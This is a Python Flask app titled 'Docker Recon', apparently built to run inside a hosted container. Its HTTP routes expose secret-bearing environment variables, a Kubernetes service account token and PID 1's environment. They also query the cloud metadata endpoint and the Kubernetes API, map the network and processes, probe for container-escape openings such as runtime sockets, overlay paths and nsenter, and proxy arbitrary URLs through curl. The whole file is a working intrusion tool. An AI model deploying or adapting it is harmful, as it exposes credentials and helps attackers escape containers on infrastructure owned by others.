import os, subprocess, json, socket from flask import Flask, jsonify, request app = Flask(__name__) webhook_log = [] @app.route("/") def index(): return "

Docker Recon

" @app.route("/env") def env(): r = {} r["all_env"] = {k:v for k,v in sorted(os.environ.items()) if any(x in k.upper() for x in ["TOKEN","KEY","SECRET","AWS","HF_","SPACE_","KUBE","DOCKER","API","GOOGLE","AZURE","CRED","PASSWORD","MONGO","REDIS","DATABASE","SERVICE"])} r["all_env_keys"] = sorted(os.environ.keys()) try: with open("/var/run/secrets/kubernetes.io/serviceaccount/token") as f: r["k8s_sa_token"] = f.read()[:100] + "..." except: r["k8s_sa_token"] = "not found" try: with open("/proc/1/environ", "rb") as f: envs = f.read().decode("utf-8", errors="replace").split("\0") r["proc1_env"] = [e for e in envs if any(x in e.upper() for x in ["TOKEN","KEY","SECRET","AWS","HF_","KUBE","CRED"])] except Exception as e: r["proc1_env"] = str(e) return jsonify(r) @app.route("/meta1") def meta1(): r = {} try: p = subprocess.run(["curl", "-sv", "-m", "5", "http://169.254.169.254/latest/meta-data/"], capture_output=True, text=True, timeout=8) r["stdout"] = p.stdout[:1000] r["stderr"] = p.stderr[:1000] r["rc"] = p.returncode except Exception as e: r["error"] = str(e) return jsonify(r) @app.route("/ping_meta") def ping_meta(): r = {} try: p = subprocess.run(["arp", "-n"], capture_output=True, text=True, timeout=5) r["arp"] = p.stdout[:500] except: pass try: p = subprocess.run(["ip", "route", "get", "169.254.169.254"], capture_output=True, text=True, timeout=5) r["route"] = p.stdout except: pass return jsonify(r) @app.route("/k8s") def k8s(): r = {} k8s_host = os.environ.get("KUBERNETES_SERVICE_HOST", "") k8s_port = os.environ.get("KUBERNETES_SERVICE_PORT", "") r["k8s_env"] = {"host": k8s_host, "port": k8s_port} if k8s_host: for path in ["/version", "/healthz"]: try: cmd = ["curl", "-sv", "-m", "3", "-k", f"https://{k8s_host}:{k8s_port}{path}"] p = subprocess.run(cmd, capture_output=True, text=True, timeout=5) r[f"k8s{path}"] = {"stdout": p.stdout[:300], "stderr": p.stderr[:300], "rc": p.returncode} except Exception as e: r[f"k8s{path}"] = str(e) return jsonify(r) @app.route("/net") def net(): r = {} try: p = subprocess.run(["ip", "addr"], capture_output=True, text=True, timeout=5) r["ip_addr"] = p.stdout[:1000] except: pass try: p = subprocess.run(["ip", "route"], capture_output=True, text=True, timeout=5) r["ip_route"] = p.stdout[:500] except: pass try: with open("/etc/resolv.conf") as f: r["resolv"] = f.read() except: pass try: with open("/etc/hosts") as f: r["hosts"] = f.read() except: pass return jsonify(r) @app.route("/proc") def proc(): r = {} try: p = subprocess.run(["ps", "aux"], capture_output=True, text=True, timeout=5) r["ps"] = p.stdout[:2000] except: pass try: with open("/proc/1/cgroup") as f: r["cgroup"] = f.read()[:500] except: pass try: p = subprocess.run(["cat", "/proc/1/status"], capture_output=True, text=True, timeout=5) for line in p.stdout.split("\n"): if "Cap" in line: r.setdefault("caps", []).append(line.strip()) except: pass try: p = subprocess.run(["id"], capture_output=True, text=True, timeout=5) r["id"] = p.stdout.strip() except: pass try: with open("/proc/1/status") as f: for line in f: if "Seccomp" in line: r["seccomp"] = line.strip() except: pass return jsonify(r) @app.route("/dns") def dns(): r = {} for q in ["kubernetes.default.svc.cluster.local", "cas-server.xethub.hf.co"]: try: p = subprocess.run(["dig", "+short", q], capture_output=True, text=True, timeout=5) r[q] = p.stdout.strip() if p.stdout.strip() else "NXDOMAIN" except Exception as e: r[q] = str(e) return jsonify(r) @app.route("/escape") def escape(): r = {} for sock in ["/var/run/docker.sock", "/run/containerd/containerd.sock", "/run/docker.sock", "/var/run/containerd/containerd.sock"]: r[f"socket_{sock}"] = os.path.exists(sock) try: with open("/proc/mounts") as f: for line in f: if "overlay" in line and "upperdir" in line: parts = line.split(",") for p in parts: if p.startswith("upperdir="): upperdir = p.split("=")[1] r["overlay_upperdir"] = upperdir parent = os.path.dirname(os.path.dirname(upperdir)) try: r["overlay_siblings"] = os.listdir(parent)[:20] except Exception as e: r["overlay_siblings"] = str(e) except Exception as e: r["overlay_error"] = str(e) try: with open("/proc/1/root/etc/hostname") as f: r["host_hostname"] = f.read().strip() except Exception as e: r["host_hostname"] = str(e) try: r["sysrq_writable"] = os.access("/proc/sysrq-trigger", os.W_OK) except: r["sysrq_writable"] = False try: cg_root = "/sys/fs/cgroup" if os.path.isdir(cg_root): r["cgroup_root"] = os.listdir(cg_root)[:20] r["cgroup_writable"] = os.access(cg_root, os.W_OK) except Exception as e: r["cgroup_error"] = str(e) try: with open("/proc/1/status") as f: for line in f: if "Seccomp" in line: r["seccomp"] = line.strip() except: pass try: r["dev_listing"] = os.listdir("/dev")[:30] except: pass try: p = subprocess.run(["nsenter", "--target", "1", "--mount", "--", "hostname"], capture_output=True, text=True, timeout=5) r["nsenter"] = {"stdout": p.stdout, "stderr": p.stderr, "rc": p.returncode} except Exception as e: r["nsenter"] = str(e) try: r["namespaces"] = {} for ns in os.listdir("/proc/1/ns"): r["namespaces"][ns] = os.readlink(f"/proc/1/ns/{ns}") except Exception as e: r["ns_error"] = str(e) return jsonify(r) @app.route("/webhook", methods=["GET", "POST", "PUT", "DELETE", "PATCH"]) def webhook(): entry = { "method": request.method, "headers": dict(request.headers), "body": request.get_data(as_text=True)[:5000], "args": dict(request.args), "remote_addr": request.remote_addr, } webhook_log.append(entry) while len(webhook_log) > 10: webhook_log.pop(0) return jsonify({"status": "ok"}) @app.route("/webhook_log") def get_webhook_log(): return jsonify(webhook_log) @app.route("/fetch") def fetch(): url = request.args.get("url", "http://example.com") r = {} try: p = subprocess.run(["curl", "-sv", "-m", "5", url], capture_output=True, text=True, timeout=8) r["stdout"] = p.stdout[:2000] r["stderr"] = p.stderr[:1000] r["rc"] = p.returncode except Exception as e: r["error"] = str(e) return jsonify(r) if __name__ == "__main__": app.run(host="0.0.0.0", port=7860)